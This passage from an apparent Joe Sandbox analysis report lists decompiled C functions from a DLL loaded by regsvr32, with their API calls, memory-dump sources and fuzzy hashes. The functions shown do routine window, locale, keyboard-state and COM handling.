                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000017,100A594C,00000000), ref: 1003B273
                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000007,100A594C,00000001), ref: 1003B28B
                                                                                                                • OleRun.OLE32(00000001), ref: 1003B299
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateInstance
                                                                                                                • String ID:
                                                                                                                • API String ID: 542301482-0
                                                                                                                • Opcode ID: 1fde761f56b54c249ecb57495a72b31083913e75a24bd9c800dedb74f9d4074e
                                                                                                                • Instruction ID: 324d8c50e8d3a31438fcbe536bc8f42647220ee4f3c1b4a0b0b6bd8788a7670d
                                                                                                                • Opcode Fuzzy Hash: 1fde761f56b54c249ecb57495a72b31083913e75a24bd9c800dedb74f9d4074e
                                                                                                                • Instruction Fuzzy Hash: 06114975A00208FFDB11DFA4CD85F8EBBF9EB49359F2041A9E604EA251D7709A40DB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10071CA2 Relevance: 4.5, APIs: 3, Instructions: 39threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 88%
                                                                                                                			E10071CA2() {
				signed int _v8;
				char _v16;
				void* __esi;
				signed int _t8;
				intOrPtr* _t15;
				intOrPtr _t16;
				char _t20;
				intOrPtr _t22;
				intOrPtr _t23;
				signed int _t24;
				int _t25;
				signed int _t27;

				_t8 =  *0x100b9e70; // 0xbb35530
				_v8 = _t8 ^ _t27;
				_t24 = 0;
				if(GetLocaleInfoA(GetThreadLocale(), 0x1004,  &_v16, 7) == 0) {
					L4:
					_t25 = GetACP();
				} else {
					_t20 = _v16;
					_t15 =  &_v16;
					if(_t20 == 0) {
						goto L4;
					} else {
						do {
							_t15 = _t15 + 1;
							_t24 = _t24 * 0xa + _t20 - 0x30;
							_t20 =  *_t15;
						} while (_t20 != 0);
						if(_t24 == 0) {
							goto L4;
						}
					}
				}
				return E1004763E(_t25, _t16, _v8 ^ _t27, _t22, _t23, _t25);
			}















                                                                                                                0x10071ca8
                                                                                                                0x10071caf
                                                                                                                0x10071cb3
                                                                                                                0x10071ccf
                                                                                                                0x10071cf0
                                                                                                                0x10071cf6
                                                                                                                0x10071cd1
                                                                                                                0x10071cd1
                                                                                                                0x10071cd6
                                                                                                                0x10071cd9
                                                                                                                0x00000000
                                                                                                                0x10071cdb
                                                                                                                0x10071cdb
                                                                                                                0x10071ce1
                                                                                                                0x10071ce2
                                                                                                                0x10071ce6
                                                                                                                0x10071ce8
                                                                                                                0x10071cee
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10071cee
                                                                                                                0x10071cd9
                                                                                                                0x10071d06

                                                                                                                APIs
                                                                                                                • GetThreadLocale.KERNEL32 ref: 10071CB5
                                                                                                                • GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007), ref: 10071CC7
                                                                                                                • GetACP.KERNEL32 ref: 10071CF0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Locale$InfoThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 4232894706-0
                                                                                                                • Opcode ID: 7c5983c97577f588b59cf57724e369f2abd5b66deef4b3ef37fb49ba411e0cc2
                                                                                                                • Instruction ID: 0c1d45a3c1da8539fc3e6f26400fbfc8b185508d0e900761260806733794f503
                                                                                                                • Opcode Fuzzy Hash: 7c5983c97577f588b59cf57724e369f2abd5b66deef4b3ef37fb49ba411e0cc2
                                                                                                                • Instruction Fuzzy Hash: 83F0FC31E002785BE711CFB889556EF77F9EB05B81B1141ADED81E7280DA246E05C7D4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100111D8 Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 79%
                                                                                                                			E100111D8(struct HWND__* _a4, signed int _a8) {
				struct _WINDOWPLACEMENT _v48;
				int _t16;

				if(L10010FF9() == 0) {
					if((_a8 & 0x00000003) == 0) {
						if(IsIconic(_a4) == 0) {
							_t16 = GetWindowRect(_a4,  &(_v48.rcNormalPosition));
						} else {
							_t16 = GetWindowPlacement(_a4,  &_v48);
						}
						if(_t16 == 0) {
							return 0;
						} else {
							return E1001118C( &(_v48.rcNormalPosition), _a8);
						}
					}
					return 0x12340042;
				}
				return  *0x100bda1c(_a4, _a8);
			}





                                                                                                                0x100111e5
                                                                                                                0x100111f9
                                                                                                                0x1001120d
                                                                                                                0x10011225
                                                                                                                0x1001120f
                                                                                                                0x10011216
                                                                                                                0x10011216
                                                                                                                0x1001122d
                                                                                                                0x00000000
                                                                                                                0x1001122f
                                                                                                                0x00000000
                                                                                                                0x10011236
                                                                                                                0x1001122d
                                                                                                                0x00000000
                                                                                                                0x100111fb
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 489b63a7479b65ba780142e98e756bd1a31218c467a0a3f2e6930d4b0fecdd43
                                                                                                                • Instruction ID: bf5f36a609a064637400546775cda49811221ced84bcc128ce8e713489aa1330
                                                                                                                • Opcode Fuzzy Hash: 489b63a7479b65ba780142e98e756bd1a31218c467a0a3f2e6930d4b0fecdd43
                                                                                                                • Instruction Fuzzy Hash: 41F03735604119BADF09EF60CC48EEE7BA9FB19280B008021FC65DA060EB34DAA59B52
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1001A1A1 Relevance: 4.5, APIs: 3, Instructions: 27keyboardCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1001A1A1(intOrPtr _a4) {
				intOrPtr _t6;

				_t6 = _a4;
				if( *((intOrPtr*)(_t6 + 4)) != 0x100 ||  *((intOrPtr*)(_t6 + 8)) != 0x70 || ( *(_t6 + 0xe) & 0x00004000) != 0 || GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
					return 0;
				} else {
					return 1;
				}
			}




                                                                                                                0x1001a1a1
                                                                                                                0x1001a1ad
                                                                                                                0x00000000
                                                                                                                0x1001a1de
                                                                                                                0x00000000
                                                                                                                0x1001a1e0

                                                                                                                APIs
                                                                                                                • GetKeyState.USER32(00000010), ref: 1001A1C5
                                                                                                                • GetKeyState.USER32(00000011), ref: 1001A1CE
                                                                                                                • GetKeyState.USER32(00000012), ref: 1001A1D7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: State
                                                                                                                • String ID:
                                                                                                                • API String ID: 1649606143-0
                                                                                                                • Opcode ID: d169fba0290c97125a9a6927c0058398b1dc64852dccf2771887701992ec3b30
                                                                                                                • Instruction ID: 3e4df28d84f45c7815f7d19b03e5f5ad91f76c43e7f59ed5851f542e4bc015ed
                                                                                                                • Opcode Fuzzy Hash: d169fba0290c97125a9a6927c0058398b1dc64852dccf2771887701992ec3b30
                                                                                                                • Instruction Fuzzy Hash: 0DE01235985296BED742D7509D00BD569D0DB027D0F168465DD44AE055C7B0CBC296A1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1000A5B9 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 39%
                                                                                                                			E1000A5B9(void* __ecx, char _a4) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr* _t19;
				char* _t24;
				intOrPtr* _t25;
				intOrPtr _t29;
				char _t37;

				_t37 = 0;
				if(_a4 != 0) {
					_t19 = E1000A552(__ecx, _a4);
					_v12 = _t19;
					if(_t19 != 0) {
						_push( &_v16);
						_push(_t19);
						if( *((intOrPtr*)( *_t19 + 0x58))() == 0 && _v16 == 2) {
							_t24 =  &_v8;
							_v8 = 0;
							__imp__CreateBindCtx(0, _t24);
							if(_t24 == 0) {
								_t25 = _v12;
								_push( &_a4);
								_push(0);
								_push(_v8);
								_a4 = 0;
								_push(_t25);
								if( *((intOrPtr*)( *_t25 + 0x50))() == 0 && _a4 != 0) {
									_t29 = E100483AC(_a4);
									_t37 = _t29;
									__imp__CoTaskMemFree(_a4);
								}
								L10020F7B( &_v8);
							}
						}
						L10020F7B( &_v12);
					}
					return _t37;
				}
				return 0;
			}











                                                                                                                0x1000a5c0
                                                                                                                0x1000a5c5
                                                                                                                0x1000a5ce
                                                                                                                0x1000a5d5
                                                                                                                0x1000a5d8
                                                                                                                0x1000a5df
                                                                                                                0x1000a5e0
                                                                                                                0x1000a5e6
                                                                                                                0x1000a5ee
                                                                                                                0x1000a5f3
                                                                                                                0x1000a5f6
                                                                                                                0x1000a5fe
                                                                                                                0x1000a600
                                                                                                                0x1000a606
                                                                                                                0x1000a607
                                                                                                                0x1000a608
                                                                                                                0x1000a60b
                                                                                                                0x1000a610
                                                                                                                0x1000a616
                                                                                                                0x1000a620
                                                                                                                0x1000a629
                                                                                                                0x1000a62b
                                                                                                                0x1000a62b
                                                                                                                0x1000a635
                                                                                                                0x1000a635
                                                                                                                0x1000a5fe
                                                                                                                0x1000a63e
                                                                                                                0x1000a63e
                                                                                                                0x00000000
                                                                                                                0x1000a643
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • CreateBindCtx.OLE32(00000000,?), ref: 1000A5F6
                                                                                                                • CoTaskMemFree.OLE32(?), ref: 1000A62B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BindCreateFreeTask
                                                                                                                • String ID:
                                                                                                                • API String ID: 2063283046-0
                                                                                                                • Opcode ID: a60a2f0ad3c0de062bd210dd787bd61b806ccdb3da1c243200eed73814e97d89
                                                                                                                • Instruction ID: 1e78cc75a8ae20b8c396a98d8a74b0a269190828820633218b219b22c11026c8
                                                                                                                • Opcode Fuzzy Hash: a60a2f0ad3c0de062bd210dd787bd61b806ccdb3da1c243200eed73814e97d89
                                                                                                                • Instruction Fuzzy Hash: D2115A7590021AFFEF10DFA0C8889DE7BB9EF466C5B148269F801DA114E731DB86DB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100422FA Relevance: 3.0, APIs: 2, Instructions: 40keyboardCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E100422FA(void* __ecx, signed int _a4, intOrPtr _a8) {
				void* __ebx;
				void* __ebp;
				void* _t12;
				signed short _t15;
				void* _t20;
				void* _t21;

				_t20 = __ecx;
				_t15 = E100177F8(__ecx);
				if(_t15 >= 0 || (_a4 & 0x0000fff0) == 0xf060 && (GetKeyState(0x73) >= 0 || GetKeyState(0x12) >= 0 || (_t15 & 0x00000100) == 0)) {
					L6:
					return E10035C9E(_t15, _t20, _t21, _a4, _a8);
				}
				_t12 = E1001593A(_t15, _t20, _a4, _a8);
				if(_t12 == 0) {
					goto L6;
				}
				return _t12;
			}









                                                                                                                0x10042300
                                                                                                                0x10042307
                                                                                                                0x1004230b
                                                                                                                0x1004234c
                                                                                                                0x00000000
                                                                                                                0x10042354
                                                                                                                0x10042343
                                                                                                                0x1004234a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004235d

                                                                                                                APIs
                                                                                                                  • Part of subcall function 100177F8: GetWindowLongA.USER32(?,000000F0), ref: 10017803
                                                                                                                • GetKeyState.USER32(00000073), ref: 10042324
                                                                                                                • GetKeyState.USER32(00000012), ref: 1004232D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: State$LongWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3716621309-0
                                                                                                                • Opcode ID: 39200d301d1b858de4d9ad93d43105858c0e4aa60223fee696361755f6f9487c
                                                                                                                • Instruction ID: 2818fe949eeaa3fada07e33bb7dd25add78df246c4191234671a53c1d3373df7
                                                                                                                • Opcode Fuzzy Hash: 39200d301d1b858de4d9ad93d43105858c0e4aa60223fee696361755f6f9487c
                                                                                                                • Instruction Fuzzy Hash: 0FF0243A30024A7AEB11BE55CC40F9E3B78DF40AE5F514071FD08CA1A2CA3ADE5292A4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100369AF Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E100369AF(void* __ecx, intOrPtr _a4) {
				void* _t4;
				void* _t13;
				intOrPtr _t14;

				_t14 = _a4;
				_t13 = __ecx;
				if(_t14 == 0xffffffff) {
					if(IsWindowVisible( *(__ecx + 0x20)) != 0) {
						if(IsIconic( *(_t13 + 0x20)) != 0) {
							_t14 = 9;
						}
					} else {
						_t14 = 1;
					}
				}
				_t4 = L10034F42(_t13, _t14);
				if(_t14 == 0xffffffff) {
					return _t4;
				}
				E1001793D(_t13, _t14);
				return L10034F42(_t13, _t14);
			}






                                                                                                                0x100369b0
                                                                                                                0x100369b8
                                                                                                                0x100369ba
                                                                                                                0x100369c7
                                                                                                                0x100369d9
                                                                                                                0x100369dd
                                                                                                                0x100369dd
                                                                                                                0x100369c9
                                                                                                                0x100369cb
                                                                                                                0x100369cb
                                                                                                                0x100369c7
                                                                                                                0x100369e1
                                                                                                                0x100369e9
                                                                                                                0x100369fd
                                                                                                                0x100369fd
                                                                                                                0x100369ee
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconicVisibleWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1797901696-0
                                                                                                                • Opcode ID: 8fb479190c408292b8806f0ed16e60ec7c97370c2ca34d43659c4ae1066408b6
                                                                                                                • Instruction ID: 32544ca3d1f440a6851f76ecaabb018c5daa1912da2af893c2db8d50037a759f
                                                                                                                • Opcode Fuzzy Hash: 8fb479190c408292b8806f0ed16e60ec7c97370c2ca34d43659c4ae1066408b6
                                                                                                                • Instruction Fuzzy Hash: A7F0A7363150316F860697299D406AE669EEF892B2B064237F465AB5E0DF709C6141D0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10056CA3 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 37%
                                                                                                                			E10056CA3(void* __eax, void* __ebx, void* __edx) {
				_Unknown_base(*)()* _t8;

				 *((intOrPtr*)(__edx + __ebx - 1)) =  *((intOrPtr*)(__edx + __ebx - 1)) + __edx;
				_t8 = SetUnhandledExceptionFilter(E1005148C());
				 *0x100be888 = 0;
				return _t8;
			}




                                                                                                                0x10056ca8
                                                                                                                0x10056cb8
                                                                                                                0x10056cbe
                                                                                                                0x10056cc5

                                                                                                                APIs
                                                                                                                • __decode_pointer.LIBCMT ref: 10056CB1
                                                                                                                  • Part of subcall function 1005148C: TlsGetValue.KERNEL32 ref: 10051499
                                                                                                                  • Part of subcall function 1005148C: TlsGetValue.KERNEL32 ref: 100514B0
                                                                                                                  • Part of subcall function 1005148C: RtlDecodePointer.NTDLL(00000001,?,1005184E,00000000,00000000,10048D26,00000000,?,?,00000001,?,?,10048D8A,00000001), ref: 100514E3
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32 ref: 10056CB8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Value$DecodeExceptionFilterPointerUnhandled__decode_pointer
                                                                                                                • String ID:
                                                                                                                • API String ID: 3433037573-0
                                                                                                                • Opcode ID: ba96318bd3f2b543104358adc6164b496102d5c4d2f6e6d4fe2fad0948d0796c
                                                                                                                • Instruction ID: cab9f6e41163872d63001fe864115963fca312adb94d19d4b818097a73cb4955
                                                                                                                • Opcode Fuzzy Hash: ba96318bd3f2b543104358adc6164b496102d5c4d2f6e6d4fe2fad0948d0796c
                                                                                                                • Instruction Fuzzy Hash: 6DC08C5D4286C00AF708D3745C8C3CD3A00D702300FD04988E88881092DCB84884C122
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1001643C Relevance: 1.9, APIs: 1, Instructions: 445COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 37%
                                                                                                                			E1001643C(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				unsigned int _t147;
				signed int _t149;
				signed int* _t152;
				intOrPtr _t159;
				intOrPtr* _t160;
				unsigned int _t163;
				unsigned int _t166;
				signed int* _t170;
				signed int* _t173;
				unsigned int _t177;
				unsigned int _t181;
				unsigned int _t185;
				signed int _t189;
				signed int* _t194;
				signed int _t195;
				unsigned int _t196;
				intOrPtr* _t197;
				unsigned int _t198;
				signed int _t213;
				signed int _t217;
				unsigned int _t224;
				void* _t225;

				_t200 = __ecx;
				_push(0x70);
				E1004764D(0x1008eace, __ebx, __edi, __esi);
				_t222 = __ecx;
				 *((intOrPtr*)(_t225 - 0x10)) = 0;
				 *((intOrPtr*)(_t225 - 0x14)) = 0x7fffffff;
				_t189 =  *(_t225 + 8);
				 *(_t225 - 4) = 0;
				if(_t189 != 0x111) {
					__eflags = _t189 - 0x4e;
					if(_t189 != 0x4e) {
						__eflags = _t189 - 6;
						_t224 =  *(_t225 + 0x10);
						if(_t189 == 6) {
							E10015E0B(_t200, _t222,  *((intOrPtr*)(_t225 + 0xc)), E10013FEA(_t189, __ecx, _t225, _t224));
						}
						__eflags = _t189 - 0x20;
						if(_t189 != 0x20) {
							L12:
							_t147 =  *(_t222 + 0x4c);
							__eflags = _t147;
							if(_t147 == 0) {
								L20:
								_t149 =  *((intOrPtr*)( *_t222 + 0x28))();
								 *(_t225 + 0x10) = _t149;
								E10012889(_t225 - 0x14, _t222, 7);
								_t194 = 0x100bc218 + ((_t149 ^  *(_t225 + 8)) & 0x000001ff) * 0xc;
								__eflags =  *(_t225 + 8) -  *_t194;
								 *(_t225 - 0x18) = _t194;
								if( *(_t225 + 8) !=  *_t194) {
									L25:
									_t152 =  *(_t225 - 0x18);
									_t195 =  *(_t225 + 0x10);
									 *_t152 =  *(_t225 + 8);
									_t152[2] = _t195;
									while(1) {
										__eflags =  *_t195;
										if( *_t195 == 0) {
											break;
										}
										__eflags =  *(_t225 + 8) - 0xc000;
										_push(0);
										_push(0);
										if( *(_t225 + 8) >= 0xc000) {
											_push(0xc000);
											_push( *((intOrPtr*)( *(_t225 + 0x10) + 4)));
											while(1) {
												_t196 = E10011C60();
